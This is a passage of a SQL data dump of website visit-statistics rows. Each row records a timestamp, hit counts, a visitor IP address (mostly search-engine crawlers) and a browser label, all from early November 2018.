249.75.218','chrome'),(324781,1541252807,1,1,0,0,'54.36.148.87','other'),(324782,1541252869,1,1,0,0,'66.249.75.13','chrome'),(324783,1541252937,1,1,0,0,'54.36.148.172','other'),(324784,1541253508,1,1,0,0,'216.244.66.241','other'),(324785,1541254175,1,1,0,0,'54.36.148.229','other'),(324786,1541254238,1,1,0,0,'54.36.148.217','other'),(324787,1541254450,1,1,0,0,'54.36.148.13','other'),(324788,1541254469,1,1,0,0,'216.244.66.241','other'),(324789,1541254633,1,1,0,0,'46.229.168.138','other'),(324790,1541254785,1,1,0,0,'54.36.148.213','other'),(324791,1541254862,1,1,0,0,'54.36.148.206','other'),(324792,1541255133,1,1,0,0,'54.36.149.51','other'),(324793,1541255155,1,1,0,0,'54.36.149.39','other'),(324794,1541255270,1,1,0,0,'54.36.149.66','other'),(324795,1541255298,1,1,0,0,'66.249.75.195','chrome'),(324796,1541255309,1,1,0,0,'66.249.75.220','chrome'),(324797,1541255535,1,1,0,0,'54.36.149.60','other'),(324798,1541255801,2,2,0,0,'40.77.167.206','other'),(324799,1541256100,3,3,0,0,'40.77.167.209','other'),(324800,1541256105,1,1,0,0,'207.46.13.231','other'),(324801,1541256286,1,1,0,0,'216.244.66.241','other'),(324802,1541256290,1,1,0,0,'40.77.167.99','other'),(324803,1541256941,1,1,0,0,'95.163.255.99','other'),(324804,1541256943,1,1,0,0,'95.163.255.92','other'),(324805,1541257099,1,1,0,0,'54.36.148.61','other'),(324806,1541257399,1,1,0,0,'207.46.13.117','other'),(324807,1541257638,1,1,0,0,'66.249.75.30','chrome'),(324808,1541257639,1,1,0,0,'66.249.75.13','chrome'),(324809,1541257679,1,1,0,0,'54.36.148.140','other'),(324810,1541257713,1,1,0,0,'54.36.148.184','other'),(324811,1541257725,1,1,0,0,'8.29.198.26','other'),(324812,1541257798,1,1,0,0,'54.36.148.147','other'),(324813,1541257888,1,1,0,0,'66.249.75.15','chrome'),(324814,1541257964,1,1,0,0,'54.36.149.93','other'),(324815,1541258338,3,3,0,0,'66.249.75.222','chrome'),(324816,1541258342,1,1,0,0,'66.249.75.218','chrome'),(324817,1541258572,1,1,0,0,'66.249.75.199','chrome'),(324818,1541258587,1,1,0,0,'54.36.148.32','other'),(324819,1541258673,1,1,0,0,'157.55.39.197','other'),(324820,1541258805,1,1,0,0,'66.249.75.29','chrome'),(324821,1541258806,1,1,0,0,'66.249.75.13','chrome'),(324822,1541258843,2,2,0,0,'66.249.75.195','chrome'),(324823,1541258933,1,1,0,0,'66.249.75.220','chrome'),(324824,1541259002,1,1,0,0,'54.36.148.156','other'),(324825,1541259162,4,4,0,0,'66.249.75.16','chrome'),(324826,1541259164,4,4,0,0,'216.244.66.241','other'),(324827,1541259285,2,2,0,0,'8.29.198.26','other'),(324828,1541259409,1,1,0,0,'54.36.149.93','other'),(324829,1541259882,1,1,0,0,'54.36.149.105','other'),(324830,1541259941,1,1,0,0,'54.36.148.15','other'),(324831,1541260102,2,2,0,0,'66.249.75.222','chrome'),(324832,1541260318,1,1,0,0,'54.36.148.174','other'),(324833,1541260542,1,1,0,0,'54.36.149.77','other'),(324834,1541260619,1,1,0,0,'54.36.149.69','other'),(324835,1541260731,2,2,0,0,'66.249.75.16','chrome'),(324836,1541260818,1,1,0,0,'54.36.148.227','other'),(324837,1541260938,1,1,0,0,'46.211.122.103','chrome'),(324838,1541261449,1,1,0,0,'54.36.148.56','other'),(324839,1541261506,1,1,0,0,'66.249.75.13','chrome'),(324840,1541261525,1,1,0,0,'54.36.148.216','other'),(324841,1541261855,5,5,0,0,'66.249.75.222','chrome'),(324842,1541261863,11,11,0,0,'66.249.75.220','chrome'),(324843,1541261867,92,92,0,0,'66.249.75.218','chrome'),(324844,1541261986,1,1,0,0,'216.244.66.241','other'),(324845,1541262010,1,1,0,0,'40.77.167.99','other'),(324846,1541262473,1,1,0,0,'46.229.168.132','other'),(324847,1541262475,1,1,0,0,'46.229.168.137','other'),(324848,1541262483,1,1,0,0,'54.36.148.139','other'),(324849,1541262772,7,7,0,0,'66.249.75.218','chrome'),(324850,1541263462,1,1,0,0,'54.36.148.21','other'),(324851,1541263574,3,3,0,0,'207.46.13.235','other'),(324852,1541263745,1,1,0,0,'66.249.75.220','chrome'),(324853,1541263872,1,1,0,0,'40.77.167.206','other'),(324854,1541263892,1,1,0,0,'54.36.149.28','other'),(324855,1541263900,1,1,0,0,'95.163.255.98','other'),(324856,1541263902,2,2,0,0,'95.163.255.96','other'),(324857,1541263907,1,1,0,0,'95.163.255.97','other'),(324858,1541264174,1,1,0,0,'40.77.167.209','other'),(324859,1541264179,1,1,0,0,'207.46.13.231','other'),(324860,1541264265,1,1,0,0,'216.244.66.241','other'),(324861,1541264395,1,1,0,0,'66.249.75.28','chrome'),(324862,1541264396,1,1,0,0,'66.249.75.15','chrome'),(324863,1541264665,1,1,0,0,'54.36.148.211','other'),(324864,1541264800,16,16,0,0,'178.154.244.29','other'),(324865,1541264817,3,3,0,0,'5.45.207.79','other'),(324866,1541264893,9,9,0,0,'178.154.244.11','other'),(324867,1541264957,1,1,0,0,'54.36.148.224','other'),(324868,1541264996,1,1,0,0,'54.36.149.50','other'),(324869,1541265416,1,1,0,0,'66.249.75.199','chrome'),(324870,1541265418,3,3,0,0,'66.249.75.222','chrome'),(324871,1541265453,1,1,0,0,'37.9.113.103','other'),(324872,1541265466,1,1,0,0,'54.36.149.60','other'),(324873,1541265544,3,3,0,0,'66.249.75.220','chrome'),(324874,1541265569,5,5,0,0,'66.249.75.218','chrome'),(324875,1541265653,1,1,0,0,'37.9.113.148','other'),(324876,1541265660,1,1,0,0,'66.249.75.16','chrome'),(324877,1541265687,1,1,0,0,'5.45.207.19','other'),(324878,1541265723,1,1,0,0,'95.163.255.98','other'),(324879,1541265726,1,1,0,0,'95.163.255.97','other'),(324880,1541265858,1,1,0,0,'40.77.167.206','other'),(324881,1541265891,1,1,0,0,'207.46.13.216','other'),(324882,1541265926,4,4,0,0,'178.154.244.11','other'),(324883,1541265941,4,4,0,0,'178.154.244.29','other'),(324884,1541266029,1,1,0,0,'54.36.148.60','other'),(324885,1541266056,4,4,0,0,'216.244.66.241','other'),(324886,1541266157,1,1,0,0,'207.46.13.231','other'),(324887,1541266162,1,1,0,0,'40.77.167.209','other'),(324888,1541266167,1,1,0,0,'207.46.13.235','other'),(324889,1541266217,1,1,0,0,'54.36.149.86','other'),(324890,1541266576,1,1,0,0,'66.249.75.16','chrome'),(324891,1541266750,1,1,0,0,'157.55.39.197','other'),(324892,1541266807,1,1,0,0,'54.36.148.166','other'),(324893,1541266855,1,1,0,0,'66.249.75.29','chrome'),(324894,1541266856,1,1,0,0,'66.249.75.15','chrome'),(324895,1541267099,1,1,0,0,'54.36.149.54','other'),(324896,1541267203,3,3,0,0,'66.249.75.222','chrome'),(324897,1541267308,3,3,0,0,'66.249.75.218','chrome'),(324898,1541267826,1,1,0,0,'66.249.75.220','chrome'),(324899,1541268039,1,1,0,0,'46.211.131.88','chrome'),(324900,1541268086,1,1,0,0,'46.229.168.137','other'),(324901,1541268091,1,1,0,0,'46.229.168.134','other'),(324902,1541268437,1,1,0,0,'54.36.148.26','other'),(324903,1541268543,1,1,0,0,'54.36.148.184','other'),(324904,1541268547,1,1,0,0,'54.36.149.13','other'),(324905,1541268569,1,1,0,0,'193.106.30.98','firefox'),(324906,1541268578,1,1,0,0,'8.29.198.26','other'),(324907,1541268695,1,1,0,0,'66.249.75.15','chrome'),(324908,1541269087,1,1,0,0,'54.36.149.94','other'),(324909,1541269280,1,1,0,0,'66.249.75.222','chrome'),(324910,1541269320,1,1,0,0,'46.229.168.145','other'),(324911,1541269578,1,1,0,0,'207.46.13.235','other'),(324912,1541269581,2,2,0,0,'40.77.167.206','other'),(324913,1541269595,1,1,0,0,'66.249.75.218','chrome'),(324914,1541269706,1,1,0,0,'216.244.66.241','other'),(324915,1541270130,1,1,0,0,'8.29.198.26','other'),(324916,1541270407,1,1,0,0,'8.29.198.27','other'),(324917,1541270724,1,1,0,0,'66.249.75.15','chrome'),(324918,1541270831,1,1,0,0,'66.249.75.220','chrome'),(324919,1541270940,1,1,0,0,'54.36.148.38','other'),(324920,1541271006,1,1,0,0,'54.36.148.107','other'),(324921,1541271139,1,1,0,0,'95.163.255.99','other'),(324922,1541271142,1,1,0,0,'95.163.255.98','other'),(324923,1541271152,1,1,0,0,'46.229.168.143','other'),(324924,1541271154,1,1,0,0,'46.229.168.154','other'),(324925,1541271352,1,1,0,0,'54.36.148.237','other'),(324926,1541271862,2,2,0,0,'216.244.66.241','other'),(324927,1541272053,1,1,0,0,'54.36.149.73','other'),(324928,1541272285,2,2,0,0,'40.77.167.209','other'),(324929,1541272381,1,1,0,0,'66.249.75.15','chrome'),(324930,1541272587,2,2,0,0,'207.46.13.235','other'),(324931,1541272711,1,1,0,0,'54.36.148.166','other'),(324932,1541272720,2,2,0,0,'66.249.75.195','chrome'),(324933,1541272722,3,3,0,0,'66.249.75.222','chrome'),(324934,1541273307,1,1,0,0,'66.249.75.220','chrome'),(324935,1541273322,1,1,0,0,'54.36.148.193','other'),(324936,1541273384,1,1,0,0,'207.46.13.231','other'),(324937,1541273389,1,1,0,0,'40.77.167.209','other'),(324938,1541273683,1,1,0,0,'40.77.167.206','other'),(324939,1541273727,1,1,0,0,'207.46.13.117','other'),(324940,1541273923,2,2,0,0,'66.249.75.15','chrome'),(324941,1541274120,1,1,0,0,'66.249.75.16','chrome'),(324942,1541274379,1,1,0,0,'54.36.148.230','other'),(324943,1541274450,1,1,0,0,'66.249.75.195','chrome'),(324945,1541274599,1,1,0,0,'54.36.149.97','other'),(324946,1541274789,1,1,0,0,'54.36.148.64','other'),(324947,1541274833,2,2,0,0,'216.244.66.241','other'),(324948,1541274863,2,2,0,0,'54.36.148.79','other'),(324949,1541275146,1,1,0,0,'194.63.141.238','chrome'),(324950,1541275174,1,1,0,0,'54.36.149.99','other'),(324951,1541275483,1,1,0,0,'54.36.148.205','other'),(324952,1541275741,1,1,0,0,'46.229.168.132','other'),(324953,1541275917,1,1,0,0,'54.36.148.236','other'),(324954,1541276160,1,1,0,0,'40.77.167.206','other'),(324955,1541276165,2,2,0,0,'207.46.13.231','other'),(324956,1541276296,1,1,0,0,'54.36.149.10','other'),(324957,1541276361,2,2,0,0,'207.46.13.216','other'),(324958,1541276498,1,1,0,0,'54.36.149.107','other'),(324959,1541276564,1,1,0,0,'46.229.168.140','other'),(324960,1541276648,1,1,0,0,'54.36.148.62','other'),(324961,1541276662,1,1,0,0,'95.163.255.96','other'),(324962,1541276665,1,1,0,0,'95.163.255.95','other'),(324963,1541276734,21,21,0,0,'178.154.244.29','other'),(324964,1541276760,9,9,0,0,'5.45.207.79','other'),(324965,1541276801,9,9,0,0,'178.154.244.11','other'),(324966,1541276889,1,1,0,0,'157.55.39.197','other'),(324967,1541277008,1,1,0,0,'87.250.224.47','other'),(324968,1541277130,4,4,0,0,'216.244.66.241','other'),(324969,1541277416,1,1,0,0,'5.45.207.19','other'),(324970,1541277436,1,1,0,0,'54.36.148.75','other'),(324971,1541277488,1,1,0,0,'54.36.149.33','other'),(324972,1541277490,1,1,0,0,'46.229.168.130','other'),(324973,1541277495,1,1,0,0,'46.229.168.143','other'),(324974,1541277728,2,2,0,0,'178.154.244.29','other'),(324975,1541277774,1,1,0,0,'178.154.244.11','other'),(324976,1541277836,1,1,0,0,'157.55.39.197','other'),(324977,1541278015,1,1,0,0,'46.229.168.140','other'),(324978,1541278111,1,1,0,0,'207.46.13.117','other'),(324979,1541278112,1,1,0,0,'54.36.148.99','other'),(324980,1541278147,1,1,0,0,'54.36.149.54','other'),(324981,1541278233,2,2,0,0,'52.58.87.44','other'),(324982,1541278307,1,1,0,0,'40.77.167.99','other'),(324983,1541278769,1,1,0,0,'54.36.148.155','other'),(324984,1541278969,1,1,0,0,'54.36.148.70','other'),(324985,1541279000,1,1,0,0,'87.244.171.98','firefox'),(324986,1541279079,1,1,0,0,'54.36.148.164','other'),(324987,1541279146,1,1,0,0,'54.36.149.48','other'),(324988,1541279423,1,1,0,0,'8.29.198.26','other'),(324989,1541279658,1,1,0,0,'54.36.148.55','other'),(324990,1541279668,1,1,0,0,'54.36.149.73','other'),(324991,1541279724,1,1,0,0,'54.36.148.64','other'),(324992,1541280170,1,1,0,0,'46.229.168.129','other'),(324993,1541280177,1,1,0,0,'46.229.168.153','other'),(324994,1541280231,2,2,0,0,'216.244.66.241','other'),(324995,1541280349,1,1,0,0,'46.211.48.185','chrome'),(324996,1541280539,3,3,0,0,'66.249.75.29','chrome'),(324997,1541280542,5,5,0,0,'66.249.75.16','chrome'),(324998,1541280548,4,4,0,0,'66.249.75.28','chrome'),(324999,1541280552,1,1,0,0,'66.249.75.15','chrome'),(325000,1541280567,1,1,0,0,'207.46.13.216','other'),(325001,1541280628,3,3,0,0,'66.249.75.30','chrome'),(325002,1541280658,3,3,0,0,'66.249.75.13','chrome'),(325003,1541280766,1,1,0,0,'54.36.148.179','other'),(325004,1541280855,1,1,0,0,'54.36.148.34','other'),(325005,1541280885,1,1,0,0,'46.229.168.143','other'),(325006,1541280994,2,2,0,0,'8.29.198.27','other'),(325007,1541281122,1,1,0,0,'54.36.148.245','other'),(325008,1541281288,1,1,0,0,'54.36.148.227','other'),(325009,1541281665,1,1,0,0,'54.36.148.206','other'),(325010,1541281705,2,2,0,0,'216.244.66.241','other'),(325011,1541281888,1,1,0,0,'54.36.149.9','other'),(325012,1541281891,2,2,0,0,'66.249.75.29','chrome'),(325013,1541282179,1,1,0,0,'66.249.75.13','chrome'),(325014,1541282223,1,1,0,0,'46.229.168.135','other'),(325015,1541282226,1,1,0,0,'46.229.168.147','other'),(325016,1541282335,1,1,0,0,'54.36.149.51','other'),(325017,1541282342,2,2,0,0,'209.90.225.82','chrome'),(325018,1541282486,1,1,0,0,'54.36.149.53','other'),(325019,1541282780,2,2,0,0,'216.244.66.241','other'),(325020,1541282992,1,1,0,0,'54.36.148.43','other'),(325021,1541283434,1,1,0,0,'66.249.75.16','chrome'),(325022,1541283508,1,1,0,0,'54.36.148.206','other'),(325023,1541283567,1,1,0,0,'54.36.148.139','other'),(325024,1541283680,1,1,0,0,'66.249.75.29','chrome'),(325025,1541283681,2,2,0,0,'66.249.75.30','chrome'),(325026,1541283753,1,1,0,0,'46.229.168.132','other'),(325027,1541283986,4,4,0,0,'66.249.75.13','chrome'),(325028,1541284008,2,2,0,0,'66.249.75.28','chrome'),(325029,1541284134,2,2,0,0,'66.249.75.15','chrome'),(325030,1541284187,1,1,0,0,'66.249.75.201','chrome'),(325031,1541284201,1,1,0,0,'66.249.75.220','chrome'),(325032,1541284341,1,1,0,0,'216.244.66.241','other'),(325033,1541284380,1,1,0,0,'54.36.148.169','other'),(325034,1541284495,1,1,0,0,'54.36.148.132','other'),(325035,1541284544,1,1,0,0,'54.36.148.111','other'),(325036,1541284730,1,1,0,0,'66.249.75.30','chrome'),(325037,1541285146,1,1,0,0,'66.249.75.28','chrome'),(325038,1541285290,1,1,0,0,'54.36.148.129','other'),(325039,1541285380,1,1,0,0,'66.249.75.13','chrome'),(325040,1541285531,1,1,0,0,'66.249.75.220','chrome'),(325041,1541285626,1,1,0,0,'46.229.168.145','other'),(325042,1541285632,1,1,0,0,'46.229.168.151','other'),(325043,1541286243,2,2,0,0,'40.77.167.206','other'),(325044,1541286377,6,6,0,0,'91.242.162.47','other'),(325045,1541286494,8,8,0,0,'178.154.244.29','other'),(325046,1541286509,1,1,0,0,'54.36.148.92','other'),(325047,1541286541,1,1,0,0,'207.46.13.235','other'),(325048,1541286572,1,1,0,0,'157.55.39.197','other'),(325049,1541286667,1,1,0,0,'46.229.168.154','other'),(325050,1541286673,1,1,0,0,'46.229.168.153','other'),(325051,1541286690,6,6,0,0,'5.45.207.79','other'),(325052,1541286693,2,2,0,0,'87.250.224.47','other'),(325053,1541286696,9,9,0,0,'178.154.244.11','other'),(325054,1541286713,1,1,0,0,'46.229.168.152','other'),(325055,1541286784,1,1,0,0,'66.249.75.222','chrome'),(325056,1541286988,1,1,0,0,'5.45.207.19','other'),(325057,1541287026,1,1,0,0,'51.255.65.46','other'),(325058,1541287128,1,1,0,0,'54.36.149.56','other'),(325059,1541287230,1,1,0,0,'54.36.148.237','other'),(325060,1541287320,4,4,0,0,'91.242.162.47','other'),(325061,1541287428,1,1,0,0,'46.229.168.147','other'),(325062,1541287460,1,1,0,0,'54.36.148.120','other'),(325063,1541287683,1,1,0,0,'46.229.168.144','other'),(325064,1541287736,1,1,0,0,'95.163.255.96','other'),(325065,1541287739,1,1,0,0,'95.163.255.97','other'),(325066,1541287825,1,1,0,0,'54.36.148.29','other'),(325067,1541288109,1,1,0,0,'54.36.149.81','other'),(325068,1541288256,1,1,0,0,'54.36.149.37','other'),(325069,1541288404,6,6,0,0,'91.242.162.47','other'),(325070,1541288911,1,1,0,0,'54.36.149.95','other'),(325071,1541288955,1,1,0,0,'54.36.148.28','other'),(325072,1541288963,2,2,0,0,'216.244.66.241','other'),(325073,1541289041,2,2,0,0,'46.229.168.144','other'),(325074,1541289043,1,1,0,0,'46.229.168.150','other'),(325075,1541289322,1,1,0,0,'62.205.134.182','other'),(325076,1541289369,1,1,0,0,'40.77.167.209','other'),(325077,1541289374,1,1,0,0,'207.46.13.235','other'),(325078,1541289377,6,6,0,0,'91.242.162.47','other'),(325079,1541289379,1,1,0,0,'40.77.167.206','other'),(325080,1541289445,1,1,0,0,'66.249.69.142','chrome'),(325081,1541289637,1,1,0,0,'54.36.149.91','other'),(325082,1541289685,1,1,0,0,'40.77.167.99','other'),(325083,1541290125,2,2,0,0,'66.249.75.15','chrome'),(325084,1541290152,2,2,0,0,'66.249.75.220','chrome'),(325085,1541290263,1,1,0,0,'8.29.198.25','other'),(325086,1541290292,2,2,0,0,'66.249.75.222','chrome'),(325087,1541290372,1,1,0,0,'66.249.75.199','chrome'),(325088,1541290530,1,1,0,0,'40.77.167.206','other'),(325089,1541290580,1,1,0,0,'54.36.149.52','other'),(325090,1541290769,4,4,0,0,'91.242.162.47','other'),(325091,1541291099,1,1,0,0,'54.36.148.60','other'),(325092,1541291486,1,1,0,0,'54.36.148.225','other'),(325093,1541291845,1,1,0,0,'66.249.75.15','chrome'),(325094,1541291848,1,1,0,0,'8.29.198.26','other'),(325095,1541291905,1,1,0,0,'46.229.168.141','other'),(325096,1541291907,4,4,0,0,'91.242.162.47','other'),(325097,1541291908,1,1,0,0,'46.229.168.135','other'),(325098,1541291935,1,1,0,0,'66.249.75.201','chrome'),(325100,1541292012,1,1,0,0,'46.229.168.145','other'),(325101,1541292014,1,1,0,0,'46.229.168.154','other'),(325102,1541292096,1,1,0,0,'8.29.198.25','other'),(325103,1541292345,1,1,0,0,'40.77.167.99','other'),(325104,1541292391,4,4,0,0,'216.244.66.241','other'),(325105,1541292414,1,1,0,0,'54.36.148.117','other'),(325106,1541292813,1,1,0,0,'54.36.149.72','other'),(325107,1541292852,1,1,0,0,'180.76.15.31','other'),(325108,1541292853,1,1,0,0,'180.76.15.18','other'),(325109,1541292870,1,1,0,0,'91.242.162.47','other'),(325110,1541293022,2,2,0,0,'66.249.75.199','chrome'),(325111,1541293023,1,1,0,0,'66.249.75.218','chrome'),(325112,1541293137,1,1,0,0,'66.249.75.222','chrome'),(325113,1541293418,1,1,0,0,'54.36.148.127','other'),(325114,1541293561,1,1,0,0,'54.36.148.29','other'),(325115,1541294125,1,1,0,0,'54.36.149.58','other'),(325116,1541294420,12,12,0,0,'91.242.162.47','other'),(325117,1541294461,5,5,0,0,'216.244.66.241','other'),(325118,1541294852,1,1,0,0,'180.76.15.28','other'),(325119,1541294853,1,1,0,0,'180.76.15.140','other'),(325120,1541294910,3,3,0,0,'178.154.244.29','other'),(325121,1541294966,2,2,0,0,'178.154.244.11','other'),(325122,1541295074,2,2,0,0,'174.199.16.18','other'),(325123,1541295132,1,1,0,0,'5.45.207.79','other'),(325124,1541295210,1,1,0,0,'54.36.148.84','other'),(325125,1541295222,1,1,0,0,'40.77.167.99','other'),(325126,1541295233,1,1,0,0,'54.36.148.51','other'),(325127,1541295350,10,10,0,0,'91.242.162.47','other'),(325128,1541295733,1,1,0,0,'95.163.255.92','other'),(325129,1541295735,1,1,0,0,'95.163.255.99','other'),(325130,1541295949,1,1,0,0,'54.36.148.132','other'),(325131,1541295961,1,1,0,0,'54.36.148.101','other'),(325132,1541296067,1,1,0,0,'54.36.148.159','other'),(325133,1541296196,1,1,0,0,'178.154.244.29','other'),(325134,1541296488,2,2,0,0,'91.242.162.47','other'),(325135,1541296710,1,1,0,0,'66.249.75.195','chrome'),(325136,1541296711,1,1,0,0,'66.249.75.222','chrome'),(325137,1541296797,1,1,0,0,'54.36.148.184','other'),(325138,1541297082,1,1,0,0,'54.36.148.153','other'),(325139,1541297213,1,1,0,0,'95.163.255.97','other'),(325140,1541297217,1,1,0,0,'95.163.255.95','other'),(325141,1541297234,1,1,0,0,'54.36.149.23','other'),(325142,1541297237,2,2,0,0,'54.36.149.76','other'),(325143,1541297402,1,1,0,0,'54.36.149.29','other'),(325144,1541297560,1,1,0,0,'66.249.75.220','chrome'),(325145,1541297616,1,1,0,0,'54.36.149.45','other'),(325146,1541297862,1,1,0,0,'54.36.148.115','other'),(325147,1541298014,1,1,0,0,'216.244.66.241','other'),(325148,1541298040,1,1,0,0,'54.36.149.12','other'),(325149,1541298075,12,12,0,0,'91.242.162.47','other'),(325150,1541298128,1,1,0,0,'46.229.168.149','other'),(325151,1541298135,1,1,0,0,'46.229.168.130','other'),(325152,1541298272,1,1,0,0,'54.36.148.132','other'),(325153,1541298337,1,1,0,0,'46.229.168.154','other'),(325154,1541298340,1,1,0,0,'46.229.168.148','other'),(325155,1541298526,1,1,0,0,'40.77.167.206','other'),(325156,1541298775,1,1,0,0,'54.36.148.159','other'),(325157,1541298854,2,2,0,0,'40.77.167.185','other'),(325158,1541298985,2,2,0,0,'91.242.162.47','other'),(325159,1541299010,1,1,0,0,'54.36.148.208','other'),(325160,1541299019,1,1,0,0,'54.36.148.23','other'),(325161,1541299295,1,1,0,0,'54.36.148.81','other'),(325162,1541299435,1,1,0,0,'54.36.149.34','other'),(325163,1541299476,1,1,0,0,'54.36.149.99','other'),(325164,1541299717,1,1,0,0,'46.229.168.135','other'),(325165,1541299720,1,1,0,0,'46.229.168.129','other'),(325166,1541299835,1,1,0,0,'54.36.148.107','other'),(325167,1541299856,1,1,0,0,'54.36.149.107','other'),(325168,1541299890,1,1,0,0,'40.77.167.99','other'),(325169,1541299944,1,1,0,0,'54.36.148.85','other'),(325170,1541300034,1,1,0,0,'66.249.75.15','chrome'),(325171,1541300067,1,1,0,0,'66.249.75.13','chrome'),(325172,1541300124,1,1,0,0,'66.249.75.218','chrome'),(325173,1541300127,4,4,0,0,'91.242.162.47','other'),(325174,1541300167,1,1,0,0,'54.36.149.57','other'),(325175,1541300391,2,2,0,0,'54.36.149.56','other'),(325176,1541300450,1,1,0,0,'54.36.148.33','other'),(325177,1541300467,1,1,0,0,'216.244.66.241','other'),(325178,1541300573,1,1,0,0,'54.36.148.134','other'),(325179,1541300765,1,1,0,0,'109.162.125.13','chrome'),(325180,1541301015,1,1,0,0,'54.36.148.207','other'),(325181,1541301076,1,1,0,0,'54.36.149.2','other'),(325182,1541301101,1,1,0,0,'8.29.198.26','other'),(325183,1541301558,1,1,0,0,'54.36.149.15','other'),(325184,1541301582,1,1,0,0,'5.45.207.79','other'),(325185,1541301889,1,1,0,0,'66.249.75.218','chrome'),(325186,1541302109,1,1,0,0,'54.36.148.49','other'),(325187,1541302182,1,1,0,0,'54.36.149.93','other'),(325188,1541302688,2,2,0,0,'8.29.198.25','other'),(325189,1541302720,1,1,0,0,'54.36.149.57','other'),(325190,1541302793,3,3,0,0,'216.244.66.241','other'),(325191,1541302866,3,3,0,0,'178.154.244.11','other'),(325192,1541302872,4,4,0,0,'178.154.244.29','other'),(325193,1541302964,1,1,0,0,'178.154.244.21','other'),(325194,1541303005,1,1,0,0,'87.250.224.65','other'),(325195,1541303120,1,1,0,0,'54.36.148.154','other'),(325196,1541303135,1,1,0,0,'95.108.181.57','other'),(325197,1541303183,1,1,0,0,'5.45.207.19','other'),(325198,1541303204,1,1,0,0,'141.8.142.144','other'),(325199,1541303206,1,1,0,0,'141.8.142.81','other'),(325200,1541303249,1,1,0,0,'54.36.148.34','other'),(325201,1541303290,1,1,0,0,'5.255.253.22','other'),(325202,1541303464,1,1,0,0,'54.36.148.128','other'),(325203,1541304161,1,1,0,0,'54.36.148.209','other'),(325204,1541304825,1,1,0,0,'54.36.149.98','other'),(325205,1541305366,5,5,0,0,'216.244.66.241','other'),(325206,1541305654,1,1,0,0,'54.36.148.174','other'),(325207,1541305817,1,1,0,0,'54.36.148.228','other'),(325208,1541306359,1,1,0,0,'54.36.148.104','other'),(325209,1541306907,1,1,0,0,'216.244.66.241','other'),(325210,1541307236,1,1,0,0,'54.36.149.17','other'),(325211,1541308162,1,1,0,0,'216.244.66.241','other'),(325212,1541308256,1,1,0,0,'54.36.148.239','other'),(325213,1541308445,1,1,0,0,'54.36.148.11','other'),(325214,1541308523,1,1,0,0,'54.36.148.221','other'),(325215,1541308769,1,1,0,0,'54.36.148.83','other'),(325216,1541308854,1,1,0,0,'54.36.149.24','other'),(325217,1541308969,1,1,0,0,'54.36.149.91','other'),(325218,1541309183,1,1,0,0,'54.36.148.47','other'),(325219,1541309949,1,1,0,0,'178.154.244.29','other'),(325220,1541310027,2,2,0,0,'178.154.244.11','other'),(325221,1541310156,1,1,0,0,'66.249.75.30','chrome'),(325222,1541310157,1,1,0,0,'66.249.75.16','chrome'),(325223,1541310176,1,1,0,0,'66.249.75.29','chrome'),(325224,1541310177,1,1,0,0,'66.249.75.15','chrome'),(325225,1541310368,4,4,0,0,'216.244.66.241','other'),(325226,1541310394,1,1,0,0,'54.36.148.120','other'),(325227,1541310669,1,1,0,0,'46.229.168.152','other'),(325228,1541310674,1,1,0,0,'46.229.168.150','other'),(325229,1541310763,1,1,0,0,'54.36.149.104','other'),(325230,1541311312,1,1,0,0,'54.36.148.147','other'),(325231,1541311334,1,1,0,0,'54.36.148.49','other'),(325232,1541311406,1,1,0,0,'54.36.149.77','other'),(325233,1541311810,1,0,1,0,'66.249.75.15',''),(325234,1541311906,1,1,0,0,'66.249.75.16','chrome'),(325235,1541311911,6,6,0,0,'66.249.75.15','chrome'),(325236,1541311919,33,33,0,0,'66.249.75.13','chrome'),(325237,1541311924,1,1,0,0,'54.36.149.14','other'),(325238,1541311943,1,1,0,0,'8.29.198.26','other'),(325239,1541311973,2,2,0,0,'66.249.75.28','chrome'),(325240,1541311993,1,1,0,0,'66.249.75.30','chrome'),(325241,1541312006,1,1,0,0,'66.249.75.29','chrome'),(325242,1541312066,1,1,0,0,'46.229.168.145','other'),(325243,1541312331,1,1,0,0,'54.36.148.191','other'),(325244,1541312821,4,4,0,0,'66.249.75.15','chrome'),(325245,1541312826,19,19,0,0,'66.249.75.13','chrome'),(325246,1541312879,45,45,0,0,'66.249.69.140','chrome'),(325247,1541313133,1,1,0,0,'40.77.167.209','other'),(325248,1541313154,1,1,0,0,'54.36.149.65','other'),(325249,1541313165,1,1,0,0,'40.77.167.215','other'),(325250,1541313528,1,1,0,0,'8.29.198.25','other'),(325251,1541313797,1,1,0,0,'8.29.198.26','other'),(325252,1541313811,5,5,0,0,'66.249.75.220','chrome'),(325253,1541314056,1,1,0,0,'207.46.13.117','other'),(325254,1541314094,4,4,0,0,'66.249.75.201','chrome'),(325255,1541314095,2,2,0,0,'66.249.75.222','chrome'),(325256,1541314215,14,14,0,0,'66.249.75.218','chrome'),(325257,1541314332,4,4,0,0,'66.249.69.142','chrome'),(325258,1541314336,6,6,0,0,'66.249.75.199','chrome'),(325259,1541314341,4,4,0,0,'66.249.69.140','chrome'),(325260,1541314365,1,1,0,0,'54.36.149.31','other'),(325261,1541314374,1,1,0,0,'54.36.148.119','other'),(325262,1541314417,12,12,0,0,'66.249.75.195','chrome'),(325263,1541314817,8,8,0,0,'66.249.75.220','chrome'),(325264,1541314863,6,6,0,0,'66.249.69.144','chrome'),(325265,1541314931,1,1,0,0,'66.249.75.15','chrome'),(325266,1541315052,1,1,0,0,'54.36.148.94','other'),(325267,1541315109,1,1,0,0,'66.249.75.222','chrome'),(325268,1541315127,7,7,0,0,'66.249.75.218','chrome'),(325269,1541315163,1,1,0,0,'157.55.39.197','other'),(325270,1541315184,1,1,0,0,'54.36.149.97','other'),(325271,1541315189,1,1,0,0,'54.36.149.91','other'),(325272,1541315199,2,2,0,0,'216.244.66.241','other'),(325273,1541315258,13,13,0,0,'66.249.69.140','chrome'),(325274,1541315296,4,4,0,0,'66.249.69.142','chrome'),(325275,1541315313,1,1,0,0,'66.249.75.201','chrome'),(325276,1541315330,3,3,0,0,'66.249.75.199','chrome'),(325277,1541315661,1,1,0,0,'66.249.69.158','chrome'),(325278,1541315828,1,1,0,0,'207.46.13.117','other'),(325279,1541315917,3,3,0,0,'66.249.69.144','chrome'),(325280,1541315919,2,2,0,0,'18.185.179.159','other'),(325281,1541316340,1,1,0,0,'54.36.149.29','other'),(325282,1541316387,3,3,0,0,'66.249.69.140','chrome'),(325283,1541316498,8,8,0,0,'66.249.75.218','chrome'),(325284,1541316505,3,3,0,0,'66.249.69.142','chrome'),(325285,1541316510,1,1,0,0,'5.45.207.80','other'),(325286,1541316517,1,1,0,0,'54.36.148.246','other'),(325287,1541316536,1,1,0,0,'141.8.142.74','other'),(325288,1541316638,3,3,0,0,'66.249.75.195','chrome'),(325289,1541316664,3,3,0,0,'66.249.75.222','chrome'),(325290,1541316667,6,6,0,0,'178.154.244.29','o